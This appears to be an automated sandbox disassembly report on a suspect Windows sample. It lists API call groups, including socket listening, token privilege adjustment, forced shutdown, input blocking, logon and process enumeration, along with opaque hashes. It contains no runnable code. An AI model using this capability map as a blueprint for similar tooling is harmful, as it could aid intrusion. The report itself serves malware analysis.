              • Instruction Fuzzy Hash: 59418D71D0024A9FCF55EF65CC89AEEBBB4FF19310F14456AE815A21A1EB309E45CFA0
              Strings
              Similarity
              • API ID:
              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
              • API String ID: 0-1546025612
              • Opcode ID: 115d4e796b40c42bd02c081cb4f680f0b7c8b1df0d8d9971f655e4ca7e3529ed
              • Instruction ID: beb0116f4d56d3fb50f98f66f59d08d72a29d66e3a88486206818105d9ac8435
              • Opcode Fuzzy Hash: 115d4e796b40c42bd02c081cb4f680f0b7c8b1df0d8d9971f655e4ca7e3529ed
              • Instruction Fuzzy Hash: 73A26F74E0421ACBDF28CF98C990BBDB7B1BB64314F1581AAD856A7280D774DE82CF51
              APIs
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: e7d5a260fb76cce847afb5088ea5685d445e33952aa346a93dfa3e56ab16ae7e
              • Instruction ID: 32ae33a7ba84e342c1562abbcc9740f6fbcff378d317497ee764f558f545730f
              • Opcode Fuzzy Hash: e7d5a260fb76cce847afb5088ea5685d445e33952aa346a93dfa3e56ab16ae7e
              • Instruction Fuzzy Hash: 3B128C70A00609EFDF19DFA4D985AAEB7F6FF58300F10456AE406E7291EB35AE11CB50
              APIs
                • Part of subcall function 001D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D8D0D
                • Part of subcall function 001D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8D3A
                • Part of subcall function 001D8CC3: GetLastError.KERNEL32 ref: 001D8D47
              • ExitWindowsEx.USER32(?,00000000), ref: 001E549B
              Strings
              Similarity
              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
              • String ID: $@$SeShutdownPrivilege
              • API String ID: 2234035333-194228
              • Opcode ID: e94fd95b80c54c4fe4ca9aa87619bc3df7b0832973691a6a3a3e208a6be7be6e
              • Instruction ID: 930bef00ddd3aeb1bb93e4c5d9dd6963c72f11ea412dd32df371c340e6f54a1b
              • Opcode Fuzzy Hash: e94fd95b80c54c4fe4ca9aa87619bc3df7b0832973691a6a3a3e208a6be7be6e
              • Instruction Fuzzy Hash: E001DF31695F556AF77C667AAC4ABBE729AAB05756F240125FC06D20D3FB901C8082A0
              APIs
              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001F65EF
              • WSAGetLastError.WSOCK32(00000000), ref: 001F65FE
              • bind.WSOCK32(00000000,?,00000010), ref: 001F661A
              • listen.WSOCK32(00000000,00000005), ref: 001F6629
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6643
              • closesocket.WSOCK32(00000000,00000000), ref: 001F6657
              Similarity
              • API ID: ErrorLast$bindclosesocketlistensocket
              • String ID:
              • API String ID: 1279440585-0
              • Opcode ID: 9dfd5cea9278d43e67570448c7e3182f8180bb1549254ebcd82e38b8cb27e7bb
              • Instruction ID: d90ff25b6275ebb09262ed29f89ced1c88d1d09fa82339e0c38bc99a4f2499c5
              • Opcode Fuzzy Hash: 9dfd5cea9278d43e67570448c7e3182f8180bb1549254ebcd82e38b8cb27e7bb
              • Instruction Fuzzy Hash: 34217E316402149FCB10EF64D989B7EB7A9EF44720F158259EA56E73E2CB70AD018B51
              APIs
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
              • _memmove.LIBCMT ref: 001D062F
              • _memmove.LIBCMT ref: 001D0744
              • _memmove.LIBCMT ref: 001D07EB
              Similarity
              • API ID: _memmove$Exception@8Throwstd::exception::exception
              • String ID:
              • API String ID: 1300846289-0
              • Opcode ID: 2c7c21ddaac8861f9bb19df5e772071fc29bebf87a8f2a582e55ae2c1a87d39f
              • Instruction ID: 1273668ca1323a21b48713b43c05d76e595539d24fd0c8566d5b33f67e66479a
              • Opcode Fuzzy Hash: 2c7c21ddaac8861f9bb19df5e772071fc29bebf87a8f2a582e55ae2c1a87d39f
              • Instruction Fuzzy Hash: ED028070E00205EFDF09DF64D985AAEBBB5EF58300F15806AE806EB355EB31DA51CB91
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DefDlgProcW.USER32(?,?,?,?,?), ref: 001819FA
              • GetSysColor.USER32(0000000F), ref: 00181A4E
              • SetBkColor.GDI32(?,00000000), ref: 00181A61
                • Part of subcall function 00181290: DefDlgProcW.USER32(?,00000020,?), ref: 001812D8
              Similarity
              • API ID: ColorProc$LongWindow
              • String ID:
              • API String ID: 3744519093-0
              • Opcode ID: b493f5d85a671c800830456592fd4e7dddb717ba7ba32eafee56966f973f273f
              • Instruction ID: db1515b372f22f00a80d54b8e9e87dc293aad712a7201acae581b066d030d2da
              • Opcode Fuzzy Hash: b493f5d85a671c800830456592fd4e7dddb717ba7ba32eafee56966f973f273f
              • Instruction Fuzzy Hash: 89A125B2119584BAD72CBB28DC88DBB399DDB42345B25021AF402D75D2CB649F039F72
              APIs
                • Part of subcall function 001F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F80CB
              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001F6AB1
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6ADA
              • bind.WSOCK32(00000000,?,00000010), ref: 001F6B13
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6B20
              • closesocket.WSOCK32(00000000,00000000), ref: 001F6B34
              Similarity
              • API ID: ErrorLast$bindclosesocketinet_addrsocket
              • String ID:
              • API String ID: 99427753-0
              • Opcode ID: ea7a4fe2123d5a9f3d154db27032e38ae6229059e50fcbb0771b96eb06da46be
              • Instruction ID: deeaf422b392cf279d6ea7fa459b24a54d428bcfff753795dbb381cd4a9b468f
              • Opcode Fuzzy Hash: ea7a4fe2123d5a9f3d154db27032e38ae6229059e50fcbb0771b96eb06da46be
              • Instruction Fuzzy Hash: A541C375B40214AFEB10BF64DC86F7EB7A89B14710F448158FA5AAB3D2DB709E018B91
              APIs
              Similarity
              • API ID: Window$EnabledForegroundIconicVisibleZoomed
              • String ID:
              • API String ID: 292994002-0
              • Opcode ID: f265affe39c37485f97a0c9f209bb37fcfcc1c83f1caaea0a2accfac9ac270b0
              • Instruction ID: 25ac7e679863e642fd7be9bcc872e351629cc06838e3c414f41af81b9fa4c54a
              • Opcode Fuzzy Hash: f265affe39c37485f97a0c9f209bb37fcfcc1c83f1caaea0a2accfac9ac270b0
              • Instruction Fuzzy Hash: A411C431750B216FE7216F26DC48B2FBB9CEF54721F844429F906D7282CB719911CEA5
              APIs
              • CoInitialize.OLE32(00000000), ref: 001EC69D
              • CoCreateInstance.OLE32(00212D6C,00000000,00000001,00212BDC,?), ref: 001EC6B5
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • CoUninitialize.OLE32 ref: 001EC922
              Strings
              Similarity
              • API ID: CreateInitializeInstanceUninitialize_memmove
              • String ID: .lnk
              • API String ID: 2683427295-24824748
              • Opcode ID: 3e27ccc8c5b50d79c99337fbfb20331731f15789006764ea25820dc96269d89d
              • Instruction ID: 8b6221407c96a62c7ec07c684a4174da0b8121eddd1fa525f06a097be4d497bf
              • Opcode Fuzzy Hash: 3e27ccc8c5b50d79c99337fbfb20331731f15789006764ea25820dc96269d89d
              • Instruction Fuzzy Hash: 48A10971108205AFD304EF64C8C1EABB7E8EFA4708F044959B55697192DB71EA49CB92
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,001C1D88,?), ref: 001FC312
              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001FC324
              Strings
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetSystemWow64DirectoryW$kernel32.dll
              • API String ID: 2574300362-1816364905
              • Opcode ID: 95bb9c4b9753eb4d13cfa77977deaf425dbbe6f956183ec32466348c0d355160
              • Instruction ID: a5d434557bac247457ee08a2b3648911fb2baa1401a425bad9ec8bb5dad4e616
              • Opcode Fuzzy Hash: 95bb9c4b9753eb4d13cfa77977deaf425dbbe6f956183ec32466348c0d355160
              • Instruction Fuzzy Hash: B3E08C7425030BCFCB344F25DA08A96B6D4FB09384B808439E989D2A50E770D840CAA0
              Similarity
              • API ID: __itow__swprintf
              • String ID:
              • API String ID: 674341424-0
              • Opcode ID: 193adebe0abeb0f89049904fe81172b32a9f3534cf7eaaa1734092c62ab38bfd
              • Instruction ID: a0dee7a7b64d0095713891a87282a8306cd8c260f844960557a903664829de42
              • Opcode Fuzzy Hash: 193adebe0abeb0f89049904fe81172b32a9f3534cf7eaaa1734092c62ab38bfd
              • Instruction Fuzzy Hash: BA22AB716083019FDB24EF24C881B6FB7E5BFA8704F15491DF89A97291DB70EA04CB92
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 001FF151
              • Process32FirstW.KERNEL32(00000000,?), ref: 001FF15F
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • Process32NextW.KERNEL32(00000000,?), ref: 001FF21F
              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 001FF22E
              Similarity
              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
              • String ID:
              • API String ID: 2576544623-0
              • Opcode ID: 225e3e4d6c0994fa9ecd725b2808372404ed5d1fda323698de5e6f42eaee9641
              • Instruction ID: 7f3fdd93687b05bca78c6c20cca71cbd8994074c1eb2a42d0170299611cf6530
              • Opcode Fuzzy Hash: 225e3e4d6c0994fa9ecd725b2808372404ed5d1fda323698de5e6f42eaee9641
              • Instruction Fuzzy Hash: 9F517D715083019FD314EF20DC85A6BB7E8EFA4710F54482DF596972A1EB70EA09CB92
              APIs
              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001DEB19
              Strings
              Similarity
              • API ID: lstrlen
              • String ID: ($|
              • API String ID: 1659193697-1631851259
              • Opcode ID: 0fac397bb3d033e3d8706a92e8a123c47bba2a94355adfc3966a3396e5db3ebf
              • Instruction ID: ece3a84f26df5c245cc9a62fb1ae8f77361f3d27372d1c331341285fa07f9162
              • Opcode Fuzzy Hash: 0fac397bb3d033e3d8706a92e8a123c47bba2a94355adfc3966a3396e5db3ebf
              • Instruction Fuzzy Hash: F1322675A047059FDB28DF19C481A6AB7F1FF48320B15C56EE89ADB3A1E770E981CB40
              APIs
              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001F26D5
              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 001F270C
              Similarity
              • API ID: Internet$AvailableDataFileQueryRead
              • String ID:
              • API String ID: 599397726-0
              • Opcode ID: 3d3a05be0f8e27d466de40fb4013d0531707e68f317972a398b09788295a7016
              • Instruction ID: 7c9e85a7a259e5f432dd57487dbc9d029400678e85e9a932c41096eb7ad48c27
              • Opcode Fuzzy Hash: 3d3a05be0f8e27d466de40fb4013d0531707e68f317972a398b09788295a7016
              • Instruction Fuzzy Hash: 1741F57560030DBFEB20EE94DC85EBBB7BCEB50724F10406AFB05E6141EBB19E419665
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EB5AE
              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001EB608
              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 001EB655
              Similarity
              • API ID: ErrorMode$DiskFreeSpace
              • String ID:
              • API String ID: 1682464887-0
              • Opcode ID: 959026456758ebb38885a3966b36b7478e8351ec01100a3ca6515001be6e1eaf
              • Instruction ID: e9fdd673d5612c3c0c42b4a268c31e280b536a115ec5aa9b9a69aba4b084d046
              • Opcode Fuzzy Hash: 959026456758ebb38885a3966b36b7478e8351ec01100a3ca6515001be6e1eaf
              • Instruction Fuzzy Hash: D8216035A00618EFCB00EFA5D8C4AAEBBB8FF58310F1480A9E905AB351DB31A915CF51
              APIs
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D8D0D
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8D3A
              • GetLastError.KERNEL32 ref: 001D8D47
              Similarity
              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
              • String ID:
              • API String ID: 1922334811-0
              • Opcode ID: 61a2823f3bcca83f8668085f25675c5e6795a95f1d8196fb501d6b15ae06172f
              • Instruction ID: 6ca6580ce1c53b5083427a8c02bc5654f074f0ca1913512b31256c327ae473ad
              • Opcode Fuzzy Hash: 61a2823f3bcca83f8668085f25675c5e6795a95f1d8196fb501d6b15ae06172f
              • Instruction Fuzzy Hash: BF1191B1414309AFE728DF54EDC5D6BB7BDFB44720B20852EF45693641EB70BC408A60
              APIs
              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001E404B
              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 001E4088
              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001E4091
              Similarity
              • API ID: CloseControlCreateDeviceFileHandle
              • String ID:
              • API String ID: 33631002-0
              • Opcode ID: 4631094c2b79619c858575c311cdd5949c5fa70c2fce3165790d20aa93b6a1ba
              • Instruction ID: 840b9766e285da5a0a60c3481da832f73af0ac7f29f6720425ed29efe92600f0
              • Opcode Fuzzy Hash: 4631094c2b79619c858575c311cdd5949c5fa70c2fce3165790d20aa93b6a1ba
              • Instruction Fuzzy Hash: 371130B1944228BFE7209BE9DC48FAFBBBCEB09750F100666BA04E7191D374594587A1
              APIs
              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001E4C2C
              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001E4C43
              • FreeSid.ADVAPI32(?), ref: 001E4C53
              Similarity
              • API ID: AllocateCheckFreeInitializeMembershipToken
              • String ID:
              • API String ID: 3429775523-0
              • Opcode ID: 6b9f4cbd96f04e286526d0469632be517f560dee103d0e6c80603607b7b8dd0f
              • Instruction ID: aa569a1626b68a78b56243e2ff26a0201ea8ba1b04467d0bdc6cdd3c65a9a2a8
              • Opcode Fuzzy Hash: 6b9f4cbd96f04e286526d0469632be517f560dee103d0e6c80603607b7b8dd0f
              • Instruction Fuzzy Hash: 6EF04975A5130CBFDF04DFF0ED89AAEBBBDEF08201F1044A9A901E2582E7746A048B50
              APIs
              • __time64.LIBCMT ref: 001E8B25
                • Part of subcall function 001A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001E91F8,00000000,?,?,?,?,001E93A9,00000000,?), ref: 001A5443
                • Part of subcall function 001A543A: __aulldiv.LIBCMT ref: 001A5463
              Strings
              Similarity
              • API ID: Time$FileSystem__aulldiv__time64
              • String ID: 0u$
              • API String ID: 2893107130-3043055072
              • Opcode ID: 0d2b0b510aef87087f307203b2f3cea72e06e3ec44122969373d7a9608136027
              • Instruction ID: 29086e4d8a4724ff94221cd9e1c15044b3d9266c1e847b11f1b1ffedf96a3d15
              • Opcode Fuzzy Hash: 0d2b0b510aef87087f307203b2f3cea72e06e3ec44122969373d7a9608136027
              • Instruction Fuzzy Hash: 7C21E4766356108FC329CF29D441A52B3E1EBA5321B288E6CD4F9CF2D0CB74B905CB94
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 17bce39cbdcc5b19347d1884f08bcf9f617cf3c1f1c6205439ea976d761828c4
              • Instruction ID: 5620dc1a592fcaa67f3bc23db6d466b159e05dd88b33b081244c5a9acf63e4ff
              • Opcode Fuzzy Hash: 17bce39cbdcc5b19347d1884f08bcf9f617cf3c1f1c6205439ea976d761828c4
              • Instruction Fuzzy Hash: 7C229B74A00216DFDB28EF54C484AAEBBF1FF19300F148469E856AB351E774AE81CF91
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 001EC966
              • FindClose.KERNEL32(00000000), ref: 001EC996
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: bfecff1cb7a785ea9eb8f6a64ca4b48965a14fbeadbc76c3a8a59e1d649d7306
              • Instruction ID: 6d7a96720c21d07abad8b09fe48398a4745e324bfd8b6c2399a78d54ab2fd6db
              • Opcode Fuzzy Hash: bfecff1cb7a785ea9eb8f6a64ca4b48965a14fbeadbc76c3a8a59e1d649d7306
              • Instruction Fuzzy Hash: 08115E726106109FD714EF29D849A2AF7E9EF94324F04855EF9AAD7291DB30AD01CB81
              APIs
              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,001F977D,?,0020FB84,?), ref: 001EA302
              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,001F977D,?,0020FB84,?), ref: 001EA314
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: d4e34e310adec9cfc66d44d7696eb4d4616144cca925fb87ee979357ac69e106
              • Instruction ID: b33804957bf129c0a9c959f9ebb6521b7ab1f030ea4b13fc85acfa893e318b67
              • Opcode Fuzzy Hash: d4e34e310adec9cfc66d44d7696eb4d4616144cca925fb87ee979357ac69e106
              • Instruction Fuzzy Hash: 47F0823558532DBBDB20AFA4DC88FEA776DBF08761F004166F918D6181D730A940CBA1
              APIs
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001D8851), ref: 001D8728
              • CloseHandle.KERNEL32(?,?,001D8851), ref: 001D873A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AdjustCloseHandlePrivilegesToken
              • String ID:
              • API String ID: 81990902-0
              • Opcode ID: 1f83b885dce90baadd485b502203a966d7e7ea5f4b4539ca047ff112e5d28064
              • Instruction ID: f2cd9cc2645513b3fb4ef95fe5d23055346933e3a031f499e85ccd1884ec52f2
              • Opcode Fuzzy Hash: 1f83b885dce90baadd485b502203a966d7e7ea5f4b4539ca047ff112e5d28064
              • Instruction Fuzzy Hash: 77E0B676014650EEE7752B60FE09D777BA9EB047A0B258829B4A680871DB62AC90DB10
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001A8F97,?,?,?,00000001), ref: 001AA39A
              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001AA3A3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 0a08f3243979922e0a85d901944a9b7942ff39f635b211bd6c6d9b918b77e2f6
              • Instruction ID: 1e849dedb2cec3d093f2b344996ec583731547fc675c7de5ec46b0299d43b5f1
              • Opcode Fuzzy Hash: 0a08f3243979922e0a85d901944a9b7942ff39f635b211bd6c6d9b918b77e2f6
              • Instruction Fuzzy Hash: 4BB09231098348ABCA902B91FD0DB883F68EB45AB2F4040A0FE0D84862CB6254508A91
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f79ecd011805419015b0b921613339890b5eb43ac3b19892550b30026da69a0
              • Instruction ID: 0709bb828e82a7e8217020bdbf90c1fe62998fbaaab78ef0622197d25b1acede
              • Opcode Fuzzy Hash: 6f79ecd011805419015b0b921613339890b5eb43ac3b19892550b30026da69a0
              • Instruction Fuzzy Hash: AC322526D69F014DD7239634E836336A259AFB73D8F15D73BF81AB59A6EF28C5830100
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 63885197a0039cfb8ed727331ae89e39becca0183403dd3076bec99e7f359b3f
              • Instruction ID: 6cc1619c83976ede0373d56362730061a96b848392aa3974cc1c99f3615855d2
              • Opcode Fuzzy Hash: 63885197a0039cfb8ed727331ae89e39becca0183403dd3076bec99e7f359b3f
              • Instruction Fuzzy Hash: 0FB1F020E2AF514DD32396399835336FA4CAFBB2D5F52D71BFC2674D22EB2185834141
              APIs
              • BlockInput.USER32(00000001), ref: 001F4218
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BlockInput
              • String ID:
              • API String ID: 3456056419-0
              • Opcode ID: 219820a6ec2de7410bdfffb4e0ede0458787b5b96308d7f7186c361c65bb5c9e
              • Instruction ID: 9a5d8076b6d59b378adda5e934608e643c81bd0e90034d7a397c5900e3044ef3
              • Opcode Fuzzy Hash: 219820a6ec2de7410bdfffb4e0ede0458787b5b96308d7f7186c361c65bb5c9e
              • Instruction Fuzzy Hash: 36E048352402145FC710EF59E844A6BF7DCAFA4760F058025FD49C7352DB71E940CB90
              APIs
              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001E4EEC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: mouse_event
              • String ID:
              • API String ID: 2434400541-0
              • Opcode ID: 829e113b8df54c080c6b7ef524a32d0f68957dafdba681fc088aebf31b7c6e04
              • Instruction ID: 41407db641db5c433f0d5e515391722d1760b1befccb1c87199f5151e52a8662
              • Opcode Fuzzy Hash: 829e113b8df54c080c6b7ef524a32d0f68957dafdba681fc088aebf31b7c6e04
              • Instruction Fuzzy Hash: 84D05E98160F843BEC7C4B279C5FF7F0208F300781FD1414AB142894C2DAD86C505030
              APIs
              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001D88D1), ref: 001D8CB3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LogonUser
              • String ID:
              • API String ID: 1244722697-0
              • Opcode ID: 4ba39ed57d0c6377bd1e7e0fea6e78bdc880acb7803ef2fd5511ff43b675cec5
              • Instruction ID: a5771608728d8af3b7a04a11a6841d7eade82cd19f8e158114275e4da68c5c5c
              • Opcode Fuzzy Hash: 4ba39ed57d0c6377bd1e7e0fea6e78bdc880acb7803ef2fd5511ff43b675cec5
              • Instruction Fuzzy Hash: E4D05E322A060EABEF018EA4ED05EAF3B6AEB04B01F408111FE15C50A1C775D835AB60
              APIs
              • GetUserNameW.ADVAPI32(?,?), ref: 001C2242
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              • Opcode ID: 6ad3adbc6b923bb6d75dc112d5027966503e9cd566732bb7aa7e674b324f00a1
              • Instruction ID: 2817d1d376bf508e5e4d55edb20d13e975079f2627816c17930b3e5ba506fee4
              • Opcode Fuzzy Hash: 6ad3adbc6b923bb6d75dc112d5027966503e9cd566732bb7aa7e674b324f00a1
              • Instruction Fuzzy Hash: 68C04CF1C40209DBDB15DB90DA88EEE77BCAB04305F104055A101F2101D7749B448E71
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 001AA36A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
